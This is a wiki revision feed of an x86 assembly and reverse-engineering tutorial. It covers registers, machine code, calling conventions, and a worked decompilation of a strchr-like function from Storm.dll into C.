Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== special purpose registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
<br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Machine_Code&diff=3152Machine Code2012-01-16T03:12:11Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will discuss more detail about how an executable file full of hex becomes assembly, and what happens to that hex once it's loaded in memory. <br />
<br />
== Machine Code ==<br />
Machine code is simply an encoding of assembly language. Every assembly instruction has one or more bytes of machine code instructions associated with it, and that sequence of bytes translates to exactly one assembly instruction. The relationship is 1:1, by definition. <br />
<br />
This is different than the relationship between C and assembly. A sequence of C commands can translate to a variety of assembly instructions, and a sequence of assembly instructions can translate to C commands. There is no strong relationship. <br />
<br />
Here is what some machine code might look like:<br />
53 8b 54 24 08 31 db 89 d3 8d 42 07<br />
<br />
Obviously, that's nothing that any normal human can read. However, when converted to assembly, it looks like this:<br />
53 push ebx<br />
8B 54 24 08 mov edx, [esp+arg_0]<br />
31 DB xor ebx, ebx<br />
89 D3 mov ebx, edx<br />
8D 42 07 lea eax, [edx+7]<br />
<br />
To show the machine code in IDA, in the settings tab find the "opcode bytes" setting and change it to 6 or 8. <br />
<br />
Generally, if you need to find out the machine language opcodes for an instruction, either looking online or compiling/disassembling a program is the easiest way to go about it. A good reference book can be found [http://www.computer-books.us/assembler.php here], which can also be ordered for free in hard copy. <br />
<br />
Some opcodes, however, are so important that they should be committed to memory. These are listed below. Note that parameters for the jumps are signed, relative jumps. That is, "74 10", for example, would jump 0x10 bytes ahead of the current instruction, and 0xF0 would jump 0x10 bytes backwards. <br />
<br />
<table border='1' cellspacing='0' cellpadding='2'><br />
<tr><td width='100'>74 xx</td><td>je</td></tr><br />
<tr><td>75 xx</td><td>jnz</td></tr><br />
<tr><td>eb xx</td><td>jmp</td></tr><br />
<tr><td>e9 xx xx xx xx</td><td>jmp</td></tr><br />
<tr><td>e8 xx xx xx xx</td><td>call</td></tr><br />
<tr><td>c3</td><td>ret</td></tr><br />
<tr><td>c2 xx xx</td><td>ret xxxx</td></tr><br />
<tr><td>90</td><td>nop</td></tr><br />
</table><br />
<br />
The section on cracking will explain why these opcodes are important.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3151Assembly Summary2012-01-16T02:54:28Z<p>Killboy: /* Simple Instructions */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial of assembly language. The commands and important information to do reverse engineering lies behind, the rest of the sections are more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, going back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand then post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions on knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For details on all instructions, you can download Intel's free manuals [http://www.intel.com/content/www/us/en/contentlibrary.html here] by searching for 'Architectures Software Developer Manuals'.<br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An addition convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3150Assembly Summary2012-01-16T02:53:58Z<p>Killboy: /* Simple Instructions */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial of assembly language. The commands and important information to do reverse engineering lies behind, the rest of the sections are more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, going back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand then post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions on knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For details on all instructions, you can download Intel's free manuals [http://www.intel.com/content/www/us/en/contentlibrary.html here] by searching for 'Architectures Software Developers Manuals'.<br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An addition convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3149Assembly Summary2012-01-16T02:41:30Z<p>Killboy: /* Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial of assembly language. The commands and important information to do reverse engineering lies behind, the rest of the sections are more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, going back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand then post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions on knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For the other hundreds of instructions, find a web reference, or order Intel's free book. A web copy of Intel's book is available [http://www.computer-books.us/assembler.php here]. <br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An addition convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_3&diff=3148Example 32012-01-16T02:23:02Z<p>Killboy: /* Annotated Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This example is the implementation of strchr() found in Storm.dll, called SStrChr() (Storm_571). <br />
<br />
Here is the prototype for this function:<br />
char *__stdcall SStrChr(const char *str, int c);<br />
<br />
And the summary of Linux's manpage for what strchr() does:<br />
<pre><br />
The strchr() function locates the first occurrence of c (converted to a<br />
char) in the string pointed to by s. The terminating null character is<br />
considered part of the string; therefore if c is `\0', the functions<br />
locate the terminating `\0'.<br />
</pre><br />
<br />
Below is the code, copied/pasted directly from IDA. The only thing different from IDA is that the addresses have been removed and the jump locations named. It would be a good exercise to use this opportunity to learn IDA a bit. Open "storm.dll" (any Blizzard game should have it) in IDA, go to the function list, and search for Storm_571. <br />
<pre><br />
push ebp<br />
mov ebp, esp<br />
mov eax, [ebp+arg_0]<br />
test eax, eax<br />
jnz short loc_1<br />
<br />
push 57h ; dwErrCode<br />
call ds:SetLastError<br />
xor eax, eax<br />
pop ebp<br />
retn 8<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_1:<br />
mov cl, [eax]<br />
test cl, cl<br />
jz short loc_3<br />
mov dl, [ebp+arg_4]<br />
jmp short loc_2<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_2:<br />
cmp cl, dl<br />
jz short loc_4<br />
mov cl, [eax+1]<br />
inc eax<br />
test cl, cl<br />
jnz short loc_2<br />
<br />
loc_3:<br />
xor eax, eax<br />
<br />
loc_4:<br />
pop ebp<br />
retn 8<br />
</pre><br />
<br />
<br />
== Annotated Code ==<br />
Please, try this yourself first!<br />
<br />
Here, comments have been added explaining each line a little bit. These comments are added in an attempt to understand what the code's doing.<br />
<pre><br />
push ebp ; Preserve ebp.<br />
mov ebp, esp ; Set up the frame pointer.<br />
mov eax, [ebp+arg_0] ; Move the first argument (that IDA has helpfully named) into eax. Recall that the first .<br />
; argument is a pointer to the string. <br />
test eax, eax ; Check if the string is 0. <br />
jnz short loc_1 ; Jump over the next section if eax is non-zero (presumably, a valid string).<br />
<br />
push 57h ; dwErrCode = ERR_INVALID_PARAMETER.<br />
call ds:SetLastError ; This library function allows a program to set/retrieve the last error message. <br />
xor eax, eax ; Clear eax (for a return 0).<br />
pop ebp ; Restore ebp.<br />
retn 8 ; Return, removing both parameters from the stack.<br />
<br />
loc_1:<br />
mov cl, [eax] ; Recall that cl is a 1-byte value at the bottom of ecx. cl gets the character at [eax]<br />
test cl, cl ; Check if the character is '\0' (which indicates the end of the string).<br />
jz short loc_3 ; If it's zero, then the character hasn't been found. Note that this differs from the<br />
; actual strchr() command, since it won't detect the terminator '\0' if c is '\0'. <br />
mov dl, [ebp+arg_4] ; Move the second parameter (named arg_4 by IDA, since it's 4-bytes into the parameter list<br />
; list) into dl, which is the right-most byte of edx.<br />
jmp short loc_2 ; Jump down to the next line (the compiler likely did something weird here, optimized <br />
; something out, perhaps).<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_2:<br />
cmp cl, dl ; Compare cl (the current character) to dl (the character being searched for).<br />
jz short loc_4 ; If they're equal, jump down, returning eax (the remaining sub-string).<br />
mov cl, [eax+1] ; Move the next character into cl.<br />
inc eax ; Point ecx at the next character.<br />
test cl, cl ; Check if the string terminator has been found.<br />
jnz short loc_2 ; Go to the top of this loop as long as the end of the string hasn't been reached. <br />
<br />
loc_3:<br />
xor eax, eax ; Returns 0, indicating that the character was not found<br />
<br />
loc_4:<br />
pop ebp ; Restore ebp's previous value<br />
retn 8 ; Return, removing 8 bytes (2 32-bit values) from the stack (the two parameters)<br />
</pre><br />
<br />
== C Code ==<br />
This is the assembly directly converted to C. Because of some funny business with jumps, I had to move the loc_4 code up to the "jz loc_4" line. If somebody can think of a more direct way to convert this (without using a goto), I'd like to hear it. <br />
<br />
Note the driver function at the top -- it's always important to do whatever you can to test the code, that way, it can be reduced and optimized and tested to ensure it still works. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
char *SStrChr(char *str, int c);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
char *test1 = "abcdefg";<br />
char *test2 = "Hellow World!";<br />
char *test3 = "Final Test!";<br />
<br />
printf("%s: '%s' == '%s'\n", test1, SStrChr(test1, 'c'), "cdefg");<br />
printf("%s: '%s' == '%s'\n", test1, SStrChr(test1, 'a'), "abcdefg");<br />
<br />
printf("%s: '%s' == '%s'\n", test2, SStrChr(test2, 'w'), "w World!");<br />
printf("%s: '%s' == '%s'\n", test2, SStrChr(test2, 'W'), "World!");<br />
<br />
printf("%s: '%s' == '%s'\n", test3, SStrChr(test3, ' '), " Test!");<br />
printf("%s: '%s' == '%s'\n", test3, SStrChr(test3, '!'), "!");<br />
<br />
return 0;<br />
}<br />
<br />
char *SStrChr(char *str, int c)<br />
{<br />
char *eax;<br />
int ebx, ecx, edx, esi, edi, ebp;<br />
<br />
// push ebp ; Preserve ebp.<br />
// mov ebp, esp ; Set up the frame pointer.<br />
// mov eax, [ebp+arg_0] ; Move the first argument (that IDA has helpfully named) into eax. Recall that the first .<br />
// ; argument is a pointer to the string.<br />
eax = str;<br />
// test eax, eax ; Check if the string is 0.<br />
// jnz short loc_1 ; Jump over the next section if eax is non-zero (presumably, a valid string).<br />
if(!eax)<br />
{<br />
// push 57h ; dwErrCode = ERR_INVALID_PARAMETER.<br />
// call ds:SetLastError ; This library function allows a program to set/retrieve the last error message.<br />
/* No point in setting last error */<br />
// xor eax, eax ; Clear eax (for a return 0).<br />
// pop ebp ; Restore ebp.<br />
// retn 8 ; Return, removing both parameters from the stack.<br />
return 0;<br />
// loc_1:<br />
</pre><br />
<br />
== Cleaned up C Code ==<br />
As usual, this is the code with the comments removed and variable names cleaned up (the next example will be interesting, I promise!)<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
char *eax;<br />
int ecx, edx;<br />
<br />
eax = str;<br />
if(!eax)<br />
return 0;<br />
<br />
ecx = (char) *eax;<br />
<br />
if(ecx)<br />
{<br />
edx = (char) c;<br />
<br />
do<br />
{<br />
if(ecx == edx)<br />
return eax;<br />
<br />
ecx = *(eax + 1);<br />
eax++;<br />
}<br />
while(ecx);<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
<br />
== Reduced C Code ==<br />
I'm going to reduce this code faster than usual, since this code is actually shorter and simpler than other examples. Why wasn't this the first example then? Not sure! <br />
<br />
First, rename variables, and remove some useless variable assignments:<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
int thischar;<br />
<br />
if(!str)<br />
return 0;<br />
<br />
thischar = (char) *str;<br />
<br />
if(thischar)<br />
{<br />
do<br />
{<br />
if(thischar == c)<br />
return str;<br />
<br />
str++;<br />
thischar = *str;<br />
}<br />
while(thischar);<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
Finally, an "if" outside of a "do..while" loop is identical to a "while" loop, so do that replacement. At the same time, move the assignment into the loop condition (rather than having it in two places). That leaves this function pretty clean:<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
char thischar;<br />
<br />
if(!str)<br />
return 0;<br />
<br />
while(thischar = *str)<br />
{<br />
if(thischar == c)<br />
return str;<br />
<br />
str++;<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3147Functions2012-01-16T02:13:16Z<p>Killboy: /* __fastcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size added to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with a parameter equal to the number of parameters, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''. <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0c; ; The function cleans up the stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans up the stack. <br />
</pre><br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall'<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific convention, can't really be identified in assembly, since it's identical to __cdecl once it reaches assembly. However, the special property of this convention is that the compiler will generate no code in a function. This allows the program, in a __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the function from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3146Functions2012-01-16T02:11:32Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size added to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with a parameter equal to the number of parameters, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''. <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0c; ; The function cleans up the stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
